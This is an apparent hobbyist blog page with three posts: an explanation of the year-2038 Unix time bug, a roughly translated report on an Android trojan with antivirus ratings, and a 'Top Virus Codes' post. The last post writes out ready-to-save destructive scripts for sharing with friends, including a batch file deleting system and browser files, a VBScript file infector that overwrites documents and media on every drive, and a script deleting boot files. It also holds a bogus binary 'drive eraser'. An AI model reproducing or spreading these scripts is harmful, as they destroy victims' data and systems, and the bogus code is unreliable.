Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Sunday, 2 September 2012

The world ends on January 19, 2038: thanks Unix!


Example showing how the date would reset, represented as a signed 32bit integer (at 03:14:08 UTC on 19 January 2038).


The year-2038 bug is similar to the Y2K bug in that it involves a time-wrap problem not handled by programmers. In the case of Y2K, many older machines did not store the century digits of dates, hence the year 2000 and the year 1900 would appear the same.

Of course we now know that the prevalence of computers that would fail because of this error was greatly exaggerated by the media. Computer scientists were generally aware that most machines would continue operating as usual through the century turnover, with the worst result being an incorrect date. This prediction withstood through to the new millennium. Affected systems were tested and corrected in time, although the correction and verification of those systems was monumentally expensive.

There are however several other problems with date handling on machines in the world today. Some are less prevalent than others, but it is true that almost all computers suffer from one critical limitation: Most programs work out their dates from a perpetual second counter - 86400 seconds per day counting from Jan 1 1970. A recent milestone was Sep 9 2001, where this value wrapped from 999'999'999 seconds to 1'000'000'000 seconds. Very few programs anywhere store time as a 9 digit number, and therefore this was not a problem.

Modern computers use a standard 4 byte integer for this second count. This is 31 bits, storing a maximum value of 231. The remaining bit is the sign. This means that when the second count reaches 2147483647, it will wrap to -2147483648.

The precise date of this occurrence is Tue Jan 19 03:14:07 2038. At this time, a machine prone to this bug will show the time Fri Dec 13 20:45:52 1901, hence it is possible that the media will call this The Friday 13th Bug.


Tuesday, 17 July 2012

New Trojan for Android

New Trojan for Android 100,000 infected devices

Private purchases malicious application software products in the Chinese mobile application stores.
Chinese virus writers managed to infect my new trojan is not less than 100 thousand mobile devices based on operating system Android. This is the conclusion, researchers from TrustGo Mobile, which was first detected malware.
According to experts, the virus «Trojan! MMarketPay.A @ Android» was distributed in at least nine Chinese stores disguised as applications and packaged installation file of popular programs.
Once infected, the virus started a mobile device covertly connect to the online store Android Market, the company owned by China Mobile, and buy paid applications, and videos.
China Mobile is one of the largest mobile operators in the world with a subscriber base of 677 million people and if you shop in store application fee is automatically deducted from the mobile client’s account. Trojan, in turn, is embedded in the process of confirming the purchase by making payment to the owner quietly smartphone.
TrustGo Mobile Experts also point out that due to the low cost of goods in the Android Market, and a moderate rate attackers, many users may not notice an increase in expenses on his account. Moreover, fraudsters can use their tactics to download and install on your phone additional malicious software. To view the report TrustGo Mobile here.
Antivirus

Ok to get a less effect from dis type of harm you need to get some good antivirus.Remember no  antivirus can protect you from all viruses. I have tested probably all antiviruses but i preferred only 4....List of 4 good antiviruses:                                                                                                        


Avast:Ok I genuinely use dis one "avast" is one of the most powerful antivirus with regular updates...sometimes may delay but you will get all the features of a pro like gps tracking, antitheft, sms/call filtering, web shield(best feature instead:but if u really wanna get protected from web use Dolphin android web-browser better than avast dis feature), runs while doing work dosen't drain you smartphone's battery(instead:use juice defender best powerful battery saving app dan any other sucking app like easy batter saver and others..)

Check out avast's android antivirus review at youtube

Lookout:Powerful ok most downloaded antivirus gr8 features like avast overall same but its not free the give the pro features only for 15 days.

kaspersky:Cool powerful features as provided by Kaspersky but not all

Norton:Though it more powerful than avast but it takes up more space and lags as well all the features like web shield sms/call filter etc..you need to buy it.


 Overall Rating


Avast : 4/5      Lookout : 3.5/5      Kaspersky : 3/5      Norton : 2/5




If you guys wanna check out more antivirus and their cool features click here




Tuesday, 29 May 2012

Top Virus Codes!!!

Posting some really cool virus codes if u guys r interested dare to check this out ;)...haha this viruses are freaking sick....check out better not try it on  your computer.... (get this all codes here are to be pasted in notepad and save with their required extensions extension and u cn put any name you wnt for dat virus file) share it with you frnds via email or fb :P and i will not be liable for any harm to ur computer the virus codes given below are meant for educational purpose if u use it as a wrong way it will be ur problem
                                                            (Notepad Viruses) 

1.Irritating Virus (Heavy virus) 

@echo off
@if exist c:\windows\system32\mouse del
c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del
c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del
c:\windows\system32\logoff.exe 
@if exist C:\program files\internet
explorer\iexplore.exe del C:\program files\internet
explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER
VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"
  
                              save the file as rinse.bat

2.CD-Rom Open and Close 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If

                               save the file as .vbs extension

3.Share this virus with ur frnds and turn off his/her computer

msg * I fuck you
msg * I dont like you
msg * Now i fuck your computer
msg * Lets see
shutdown -c "Error! You are too stupid!"-s

                               save the file as .bat extension with anyname u wnt

4.Enter button simultaneously

Set wshShell=Wscript.createObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys"{ENTER}"
loop

                                save the file as .vbs extension

5.Open Notepad Continuously

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

                                        save the file as .bat extension

6.Warning!!:Ok now i  m going to type a code of real virus rest are all kinda not harm like this 1 but this one is not a plaything...check out this virus at your own risk

Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next


Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css")
or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or
(ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or 
(ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End If
Next
End Function


Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function

                              
                                 save the file as .vbs extension


                                                   Trojan!!!!
7.Crash computer forever ;)

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

                                         save the file as .bat extension

8.Format or delete your entire Hard Drive

Steps:-

1)Code:01001011000111110010010101010101010000011111100000
2)Save the file as anyname .exe
3)Run it..beware ur entire HDD will be erased :)


O Guys check out some really spooky site meant for u .heheh.....don't afraid this are the ratings from WOT of those site beware check this site some may contain adult or pornographic.(i will not be liable for any harm to ur computer the links posted below are rating from Wot which gives rating to websites if u do visit the real website u will be visiting the site on ur wish the sites given below are for educational purpose)


                                  aaah!!! this will be enough for you guys wnt some more will be posting some more codes i m tired now -_-  checkout for latest updates.... or subscribe us with your email we will send u spams :D....haha joking get latest feeds from our blog......right at you inbox ;)

If u wnt some more blacklisted domains check this out ------>>>MDL